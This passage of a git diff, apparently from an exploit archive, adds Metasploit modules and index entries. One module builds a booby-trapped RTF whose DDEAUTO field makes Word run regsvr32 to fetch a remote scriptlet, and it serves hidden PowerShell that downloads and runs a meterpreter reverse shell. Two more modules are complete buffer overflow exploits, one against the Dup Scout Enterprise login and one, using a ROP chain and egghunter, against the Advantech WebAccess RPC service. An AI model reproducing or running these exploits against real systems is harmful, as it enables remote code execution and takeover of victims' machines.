['URL', 'https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563'], + ['URL', 'https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/'] + ], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'win', + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + ['Microsoft Office', {} ], + ], + 'DefaultTarget' => 0, + 'Payload' => { + 'DisableNops' => true + }, + 'DefaultOptions' => { + 'DisablePayloadHandler' => false, + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', + 'EXITFUNC' => 'thread' + } + )) + register_options([ + OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]), + OptPath.new("INJECT_PATH", [false, "Path to file to inject", nil]) + ]) + end + + def gen_psh(url, *method) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#{filename}')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + + download_and_run = "#{ignore_cert}#{download_string}" + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def on_request_uri(cli, _request) + if _request.raw_uri =~ /\.sct$/ + print_status("Handling request for .sct from #{cli.peerhost}") + payload = gen_psh("#{get_uri}", "string") + data = gen_sct_file(payload) + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering payload to #{cli.peerhost}...") + p = regenerate_payload(cli) + data = cmd_psh_payload(p.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') + end + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). + if command == '' + return %{} + # If a command is provided, tell the target system to execute it. + else + return %{} + end + end + + def retrieve_header(filename) + if (not datastore['INJECT_PATH'].nil?) + path = "#{datastore['INJECT_PATH']}" + else + path = nil + end + if (not path.nil?) + if ::File.file?(path) + ::File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s + print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n" + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n" + end + return header + end + + def create_rtf + # + header = retrieve_header(datastore['FILENAME']) + field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165 ' + field_class << "DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" }}" + field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n" + field_class << '\insrsid5790315' + "\n" + field_class << '\par }' + footer = '}}' # footer + rtf = header + field_class + footer + rtf + end + + def primer + file_create(create_rtf) + end +end \ No newline at end of file diff --git a/exploits/windows/remote/43339.rb b/exploits/windows/remote/43339.rb new file mode 100755 index 000000000..436cc0389 --- /dev/null +++ b/exploits/windows/remote/43339.rb @@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dup Scout Enterprise Login Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Dup Scout Enterprise + 10.0.18. The buffer overflow exists via the web interface during + login. This gives NT AUTHORITY\SYSTEM access. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'sickness' # Original discovery + ], + 'References' => + [ + [ 'EDB', '43145' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" + }, + 'Targets' => + [ + [ 'Dup Scout Enterprise 10.0.18', + { + 'Ret' => 0x10090c83, # jmp esp - libspp.dll + 'Offset' => 780 + } + ], + ], + 'Privileged' => true, + 'DisclosureDate' => 'Nov 14 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(80)]) + + end + + def check + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + connect + + print_status("Generating exploit...") + + evil = rand_text(target['Offset']) + evil << [target.ret].pack('V') + evil << make_nops(12) + evil << payload.encoded + evil << make_nops(10000 - evil.length) + + vprint_status("Evil length: " + evil.length.to_s) + + sploit = "username=" + sploit << evil + sploit << "&password=" + sploit << rand_text(evil.length) + sploit << "\r\n" + + print_status("Triggering the exploit now...") + + res = send_request_cgi({ + 'uri' => '/login', + 'method' => 'POST', + 'content-type' => 'application/x-www-form-urlencoded', + 'content-length' => '17000', + 'data' => sploit + }) + + handler + disconnect + + end +end \ No newline at end of file diff --git a/exploits/windows/webapps/43340.rb b/exploits/windows/webapps/43340.rb new file mode 100755 index 000000000..47d30ec64 --- /dev/null +++ b/exploits/windows/webapps/43340.rb @@ -0,0 +1,141 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Advantech WebAccess 8.2. + By sending a specially crafted DCERPC request, an attacker could overflow + the buffer and execute arbitrary code. + }, + 'Author' => [ 'mr_me ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'ZDI', '17-938' ], + [ 'CVE', '2017-14016' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 2048, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', + { + 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 + 'Slide' => 0x07048f5b, # retn + 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 + } + ], + ], + 'DisclosureDate' => 'Nov 02 2017', + 'DefaultTarget' => 0)) + register_options([ Opt::RPORT(4592)]) + end + + def create_rop_chain() + + # this target opts into dep + rop_gadgets = + [ + 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] + 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] + 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] + 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] + 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] + 0x07024822, # & push esp # ret [BwPAlarm.dll] + 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] + 0xffffffff, # Value to negate, will become 0x00000001 + 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] + 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] + rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] + 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) + 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] + 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] + 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] + 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] + 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] + rand_text_alpha(4).unpack('V'), + rand_text_alpha(4).unpack('V'), + 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] + 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] + 0x90909090, # nop + 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] + ].flatten.pack("V*") + return rop_gadgets + end + + def exploit + connect + handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + # send the request to get the handle + resp = dcerpc.call(0x4, [0x02000000].pack('V')) + handle = resp.last(4).unpack('V').first + print_good("Got a handle: 0x%08x" % handle) + egg_options = { :eggtag => "0day" } + egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) + + # apparently this is called a ret chain + overflow = [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Jmp']].pack('V') + overflow << [target['Ret']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << [target['Slide']].pack('V') + overflow << create_rop_chain() + overflow << egghunter + overflow << egg + overflow << rand_text_alpha(0x1000-overflow.length) + + # sorry but I dont like msf's ndr class. + sploit = [handle].pack('V') + sploit << [0x000138bd].pack('V') # opcode we are attacking + sploit << [0x00001000].pack('V') # size to copy + sploit << [0x00001000].pack('V') # size of string + sploit << overflow + print_status("Trying target #{target.name}...") + begin + dcerpc_call(0x1, sploit) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + ensure + disconnect + end + handler + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4de84c0fa..9e66678ab 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16023,11 +16023,16 @@ id,file,description,date,author,type,platform,port 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows, 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows, +43202,exploits/windows/remote/43202.py,"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)",2017-11-29,"Miguel Mendez Z",remote,windows, 43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80 43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi, 43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23 43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows, 43236,exploits/windows/remote/43236.py,"LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass)",2017-12-08,wetw0rk,remote,windows,21 +43338,exploits/windows/remote/43338.rb,"Microsoft Office - DDE Payload Delivery (Metasploit)",2017-12-14,Metasploit,remote,windows, +43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - Login Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows, +43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php, +43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Remote root Code Execution",2017-12-14,"Philip Pettersson",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -38360,4 +38365,12 @@ id,file,description,date,author,type,platform,port 43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, 43323,exploits/php/webapps/43323.txt,"Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection",2017-12-12,"Ihsan Sencan",webapps,php,80 43324,exploits/php/webapps/43324.txt,"Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload",2017-12-12,"Colette Chamberland",webapps,php,80 +43329,exploits/php/webapps/43329.txt,"Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, +43330,exploits/php/webapps/43330.txt,"Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php, 43332,exploits/cgi/webapps/43332.txt,"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read",2017-12-13,"Jakub Palaczynski",webapps,cgi,443 +43333,exploits/php/webapps/43333.txt,"Readymade Video Sharing Script 3.2 - HTML Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43334,exploits/php/webapps/43334.txt,"Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43335,exploits/php/webapps/43335.html,"FS Lynda Clone 1.0 - SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, +43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php, +43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592